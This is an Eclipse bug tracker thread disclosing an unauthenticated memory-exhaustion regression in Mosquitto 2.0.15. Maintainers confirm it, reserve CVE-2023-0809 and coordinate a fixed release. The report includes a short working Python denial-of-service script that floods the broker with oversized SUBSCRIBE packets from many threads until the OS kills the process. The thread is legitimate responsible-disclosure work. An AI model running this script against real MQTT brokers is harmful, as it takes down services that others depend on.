Community
Participate
Working Groups
Created attachment 288879 [details] attack script Hello, I found unauthenticated clients still can cause excessive memory use although the fix for CVE-2017-7651 in Eclipse Mosquitto 2.0.15. To fix CVE-2017-7651, a limitation on the remaining length of CONNECT command has been applied to avoid unauthenticated clients causing excessive memory use. (https://github.com/eclipse/mosquitto/blob/a8448a9c7b14bdaee6ec80419d43fd6544e789b6/lib/packet_mosq.c#L456) ============================= case CMD_CONNECT: if(mosq->in_packet.remaining_length > 100000){ /* Arbitrary limit, make configurable */ return MOSQ_ERR_MALFORMED_PACKET; } break; ============================= However, I found other commands (like SUBSCRIBE) may also cause the same situation (unauthenticated clients can cause excessive memory),which means other commands may also need limitation. Environment: docker Ubuntu 20.04.3 LTS with 4GB RAM mosquitto version 2.0.15 (github commit a8448a9c7b14bdaee6ec80419d43fd6544e789b6 on Aug 16) Attack simulation: run server: ============================== ./src/mosquitto -c mosquitto.conf ============================== In mosquitto.conf, disable anonymous ============================== allow_anonymous false ============================== run attack script: ============================== python mosquitto_atk.py ============================== the attack script (in python) may seems like ============================== import socket import threading import time ip_address = "0.0.0.0" port = 1883 payload = b"\x80\x80\x80\x80t" + b"\01"*100000000 # mqtt SUBSCRIBE type message def send_attack(): soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM) soc.connect((ip_address,port)) soc.sendall(payload) while(True): for i in range(50): t = threading.Thread(target=send_attack) t.setDaemon(True) t.start() time.sleep(1) ============================== Result: the server's RAM memory ends and the O.S. kills the process for Out of Memory (OOM)
Thank you for your report. I'm cc'ing the Mosquito's project lead (Roger) who can have a look at it.
Thank you for the report and the script. I confirm that this is a regression. Mikaël, could you please assign a CVE for this issue? Description: If a malicious client sends as its first command a valid MQTT packet that is not a CONNECT command, Mosquitto will attempt to allocate memory for the entire packet before rejecting it. This means it is possible for a malicious client to cause significant memory use and a denial of service. Affected versions: 1.6.7 to 2.0.15 inclusive. Fixed in 1.6.14 and 2.0.16. CVSS: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O
I do not think that there is sufficient time before the Christmas break to send out advance notice of the upcoming release, make the release, and still have confidence that updates will be made. I suggest it would therefore be best to wait until after the New Year to announce the new releases.
Roger, CVE-2023-0809 has been reserved. It does not contain any information about the affected project or the vulnerability. Let us know when you're ready for it to be published with the description. Thanks!
I'm aware we're coming up on a 90 day deadline since this report. In the interim we have found another security related bug that needs addressing, and a further bug has just been discovered as part of an external security audit. We would like to beg your patience until after the external security audit is complete, in a few weeks, so we can make a single release that addresses everything found.
Hello Roger, Do you have an ETA for the release to communicate to the reporter? Kind regards, Marta
The issue has been released. @Roger please take a look if we need any updates in the record.